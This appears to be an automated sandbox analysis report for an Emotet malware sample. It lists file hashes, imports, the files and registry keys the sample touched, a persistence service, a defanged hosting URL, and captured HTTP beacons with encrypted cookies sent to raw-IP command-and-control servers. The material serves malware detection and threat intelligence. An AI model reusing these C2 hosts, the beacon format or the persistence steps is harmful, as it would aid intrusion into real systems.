MalScore
100/100
MalFamily
Emotet

Bz4pEqDQw

File details
File type: PE32 executable (GUI) Intel 80386, for MS Windows
File size: 354.00 KB (362496 bytes)
Compile time: 2018-12-01 19:46:33
MD5: a82c84fabb131cfc7843c36aa6072f37
SHA1: 2832eb9d2ce0f5bd801a3cb40bca9a7faa8fe1d6
SHA256: 1b87df14e6426cecd0ee7ccdf48c6e721ce932c399f27abe14e0dcdfad8b64ea
Import hash: ff1776618d4045eb9408ccb4438426af
Sections 7 .text .data .idata c6J|L K9s .rsrc .reloc
Directories 5 import export resource debug relocation
First submission: 2018-12-07 11:42:05
Last submission: 2018-12-07 11:42:05
Filename detected: - Bz4pEqDQw (1)
URL file hosting
hXXp://triton.fi/Bz4pEqDQw/VirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-12-07 05:31:27 [47/69] VirusTotal
PE Sections 0 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x1000 0x7794 30720 3903d88df2a3b93746dcd17ff137f59a c1bb8a01d132c7f2d608f689982ac4bac4847f74
.data 0x9000 0x47a0 11776 1740a9d0e768aff0465067729656f712 0d0c1bba309fa20c18483cdc4ca0c3ce250a1b59
.idata 0xe000 0x2ea 1024 8a6ec6119694874b31bf68dfa5de1db5 09aa88f5d9b06f5eca4372a48037e630acd7825a
c6J|L 0xf000 0x213dc 136192 40d69ec42c58d3f75b7d4ad657069128 016b3cb435e81f8e7a49a6224a8df9f914c33f9a
K9s 0x31000 0x2ab1e 175104 e70b4103da1c6dbad06e112ea36e1ed5 751d92b80d9b0d7ca0354ddaed67ea97ff0bf38e
.rsrc 0x5c000 0xe90 4096 b52464f5acb43b6921fdc92eafeecdb5 0b745ee42172d0ec84083fc8f6474c4b9e05964e
.reloc 0x5d000 0x9b0 2560 a1008e9887ca4a819dd639178144ba28 1b7559e1f97d8b3bb1b12ba42845ebbdb452bf95
Meta Info
No Meta found in this file
XOR
No XOR information found in this file.
Signature
This file isn't digitally signed
Packer(s)
No packers found for this file
File found
File type: Library
ADVAPI32.dll
SHLWAPI.dll
SHELL32.dll
AVIFIL32.dll
USER32.dll
SETUPAPI.dll
KERNEL32.dll
IP Found
No IP detected
URL(s)
No URL found
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-12-07 11:37:45 2018-12-07 11:40:51 186

14 Behaviors detected by system signatures

12 Summary items with data

Files


Read Files


Write Files

C:\Windows\SysWOW64\ifacerunning.exe
\??\SPDevice
C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\Cache\cache.dat

Delete Files

C:\Windows\SysWOW64\hexapremium.exe
C:\Users\Seven01\AppData\Local\Temp\Bz4pEqDQw.exe
C:\Windows\SysWOW64\ifacerunning.exe:Zone.Identifier

Keys

HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\InactivityShutdownDelay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\KeepRunningThresholdMins

Read Keys


Write Keys

HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings

Delete Keys

Nothing to display

Mutexes

PEMB48
PEMA7C
Global\IE4BCC4DD
Global\ME4BCC4DD
PEM1E0
PEM9E8
IESQMMUTEX_0_208

Resolved APIs

kernel32.dll.VirtualAlloc
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.VirtualProtect
user32.dll.wsprintfA
kernel32.dll.SetLastError
kernel32.dll.FreeConsole
kernel32.dll.lstrlenA
kernel32.dll.lstrcmpA
kernel32.dll.GetLastError
kernel32.dll.GetCurrentProcess
kernel32.dll.GetCurrentProcessId
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
dwmapi.dll.DwmIsCompositionEnabled
oleaut32.dll.#200
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
comctl32.dll.#385
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
ole32.dll.CreateBindCtx
ole32.dll.CoTaskMemAlloc
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
comctl32.dll.#328
comctl32.dll.#334
oleaut32.dll.#2
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
ole32.dll.CoCreateInstance
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
ntmarta.dll.GetMartaExtensionInterface
advapi32.dll.SetSecurityDescriptorDacl
advapi32.dll.IsTextUnicode
comctl32.dll.#332
comctl32.dll.#338
comctl32.dll.#339
shell32.dll.#102
advapi32.dll.OpenThreadToken
propsys.dll.PSLookupPropertyHandlerCLSID
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
propsys.dll.PSCreatePropertyStoreFromObject
propsys.dll.#417
propsys.dll.PropVariantToStringAlloc
ole32.dll.PropVariantClear
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PropVariantToBuffer
propsys.dll.PropVariantToUInt64
propsys.dll.PropVariantToBoolean
setupapi.dll.CM_Get_Device_Interface_List_ExW
propsys.dll.InitPropVariantFromBuffer
comctl32.dll.#386
advapi32.dll.GetNamedSecurityInfoW
advapi32.dll.TreeSetNamedSecurityInfoW
ole32.dll.CoUninitialize
comctl32.dll.#329
comctl32.dll.#388
comctl32.dll.#321
ole32.dll.CoRevokeInitializeSpy
oleaut32.dll.#500
comctl32.dll.#387
comctl32.dll.#327
advapi32.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptGenKey
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptDuplicateHash
cryptsp.dll.CryptEncrypt
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
rasapi32.dll.RasConnectionNotificationW
sechost.dll.OpenServiceA
sechost.dll.NotifyServiceStatusChangeA
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
oleaut32.dll.#8
oleaut32.dll.#9
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
advapi32.dll.RegOpenKeyW
ole32.dll.StringFromIID
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
setupapi.dll.SetupDiGetClassDevsW
setupapi.dll.SetupDiEnumDeviceInfo
setupapi.dll.SetupDiGetDeviceRegistryPropertyW
setupapi.dll.SetupDiDestroyDeviceInfoList
wintrust.dll.WinVerifyTrust
setupapi.dll.SetupDiEnumDeviceInterfaces
setupapi.dll.SetupDiGetDeviceInterfaceDetailW
kernel32.dll.GetSystemFirmwareTable
ntdll.dll.ZwQueryInformationProcess
kernel32.dll.IsDebuggerPresent

Execute Commands

"C:\Windows\SysWOW64\ifacerunning.exe"

Started Services

ifacerunning
ifacerunning

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-12-07 11:37:45 2018-12-07 11:40:51 186

41 HTTP Request(s) detected

http://187.155.234.215:443/
  • Hostname: 187.155.234.215:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 7852=Fp4eRUDnjiiNAY91Scjgg4klRFI+cnXgIEjjE6iFro1AqrW4c8XTAXygQ7oPQs6y2vRN+efGvoDCQ4V0bs/8dSpt/bHvB7F4BBXVV62IhH3XOpj44Asw81DJdLFvAgUzllJHwqltQ9czmpCEUIpuAroSTcE/s4nqnRSvJuLjytH0GMReWDilWh0M3FeZQ3m3NxUR+6DLlmHaeGLk0/wSRjrs1KWaAsJLgUWOn8wfBcyaE7lecOfG6f4WqSh7qMyO+X72zIsJdp7V6+U0x9j+q2PxKE8shK57g7VHMjygcsLOaouUWLLgoMLgTg1jcKAge7dUMXllR53KCKntYShNnk4t4SmYgNDFKyc4K6b7uOr+WQjZN/njTofLRflsLJ22ucu7yIifWCKIV404vfqSJQ/sSfblZTkoAGXUgiZvywYWvYmv
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 187.155.234.215:443
Connection: Keep-Alive
Cache-Control: no-cache

http://187.155.234.215:443/
  • Hostname: 187.155.234.215:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 52851=sfq8kM5HUv1plVJclHgOr2F5al+10cQ0cyoWtOCe6PJUBfgPZEQlBSa3zZDbf2ivNb9Xbk6bbwY8Nuxzl6ADX8X4yBckVqXauEnQidrstcG6AE4IRyqb5Avs/TDyFMtKrdAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 187.155.234.215:443
Connection: Keep-Alive
Cache-Control: no-cache

http://187.155.234.215:443/
  • Hostname: 187.155.234.215:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 57543=GEFbYl/5OGXAgGqweKKW1kg6QWV2753yCGz6GeBJ0B+2AtpTGdBn61odjsGppMO9KDLpe4mxSVuXoYnh6XKJPcd/HPZoSBMsAycsBNJmvN2PMzNyCoq4F/FrWoVc6+iT3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 187.155.234.215:443
Connection: Keep-Alive
Cache-Control: no-cache

http://187.155.234.215:443/
  • Hostname: 187.155.234.215:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 9074=AD9CeRc1sJV+vmAsS0BuFJ++M9cWwp6Wl0/eAiBjf5Yc0HuCWmqvHt2vp3PUCY/zkA+ig848Wy4JnbRh1Ih7tlozBCj0OOg7Gm4YHBabqEmVbxBck8jic2BLuVkhgPpg3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 187.155.234.215:443
Connection: Keep-Alive
Cache-Control: no-cache

http://200.60.71.194:443/
  • Hostname: 200.60.71.194:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 59455=mGdQSBF/kZoUeL8rbKjyoB7HQ3AflCaNpqgP/7hjgeIbh2lwubNqPnK9k6AnEFgWTgGPId1OxStCa7MXa6XRDhXk4ZRP78A6IhZpjxdKaLbIZiCoLoa6y/2hdEB5ZFFfllJHwqltQ9czmpCEUIpuAroSTcE/s4nqnRSvJuLjytH0GMReWDilWh0M3FeZQ3m3NxUR+6DLlmHaeGLk0/wSRjrs1KWaAsJLgUWOn8wfBcyaE7lecOfG6f4WqSh7qMyO+X72zIsJdp7V6+U0x9j+q2PxKE8shK57g7VHMjygcsLOaouUWLLgoMLgTg1jcKAge7dUMXllR53KCKntYShNnk4t4SmYgNDFKyc4K6b7uOr+WQjZN/njTofLRflsLJ22ucu7yIifWCKIV404vfqSJQ/sSfblZTkoAGXUgiZvywYWvYmv
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 200.60.71.194:443
Connection: Keep-Alive
Cache-Control: no-cache

http://200.60.71.194:443/
  • Hostname: 200.60.71.194:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 30343=q7wn4I7zI1bzdyaFrOw4IHqL1plIq0KAuZX87Wwajt0Bq4bV63Ejz0D+njT61FT2kAit1dTqjpGV3llOIpS6p9/SnSfpH64cSQ9sTk/PWU1UL8Zr+Ujn2Q7+X3SmbbVQrdAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 200.60.71.194:443
Connection: Keep-Alive
Cache-Control: no-cache

http://200.60.71.194:443/
  • Hostname: 200.60.71.194:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-12-07 11:37:45 2018-12-07 11:40:51 186

37 Host(s) detected


Host(s) by Country

Hosts Country
13 United States
5 Mexico
3 United Kingdom
3 Japan
2 Argentina
2 Vietnam
2 Canada
2 Germany
1 Ireland
1 Chile
1 Peru
1 Costa Rica
1 Turkey

#infosec #automation

TheSystem Itself @ 2018-12-07 11:42:11

Detected family: #Emotet

TheSystem Itself @ 2018-12-07 11:48:03